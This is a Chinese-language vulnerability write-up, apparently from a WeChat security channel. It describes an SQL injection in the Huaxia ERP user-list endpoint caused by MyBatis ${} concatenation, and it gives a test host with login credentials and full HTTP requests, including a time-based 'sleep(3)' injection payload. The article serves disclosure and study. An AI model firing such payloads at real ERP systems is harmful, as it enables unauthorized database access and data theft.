> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/o-lmJHCaCiEqfdG1e_L3Lg)
测试靶场
靶场地址 | http://47.116.69.14 |
账户密码 | jsh | 123456 |
**1、描述**
华夏 ERP 基于 SpringBoot 框架和 SaaS 模式,可以算作是国内人气比较高的一款 ERP 项目,但经过源码审计发现其存在多个漏洞,本篇为 SQL 注入漏洞解析。
**2、影响范围**
华夏 ERP
**3、漏洞复现**
从开源项目本地搭建来进行审计,源码下载地址:
百度网盘 https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw 提取码: 814g
漏洞复现:
1、漏洞代码位置
```
src/main/resources/mapper_xml/UserMapperEx.xml
```

使用 mybatis 时 ${} 会对参数和 sql 语句进行拼接,因而存在 sql 注入漏洞
2、漏洞验证
正常查询

```
GET /user/list?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22q%22%2C%22offset%22%3A%221%22%2C%22rows%22%3A%221%22%7D¤tPage=1&pageSize=10&t=1615274773529 HTTP/1.1
Host: 47.116.69.14
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://47.116.69.14/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274745; JSESSIONID=C5EBD91E0E68081AA25F206F2FECAC82; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274770
```
使用 sleep 延时注入

```
GET /user/list?search=%7B%22userName%22%3A%22'and+sleep(3)--%22%2C%22loginName%22%3A%22q%22%2C%22offset%22%3A%221%22%2C%22rows%22%3A%221%22%7D¤tPage=1&pageSize=10&t=1615274773529 HTTP/1.1
Host: 47.116.69.14
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://47.116.69.14/pages/manage/user.html
Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274745; JSESSIONID=C5EBD91E0E68081AA25F206F2FECAC82; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1615274770
```
3、漏洞代码
src/main/java/com/jsh/erp/controller/ResourceController.java

src/main/java/com/jsh/erp/service/CommonQueryManager.java

src/main/java/com/jsh/erp/service/user/UserComponent.java

src/main/java/com/jsh/erp/service/user/UserService.java

src/main/resources/mapper_xml/UserMapperEx.xml


扫取二维码获取
更多精彩

Qingy 之安全

公众号

点个在看你最好看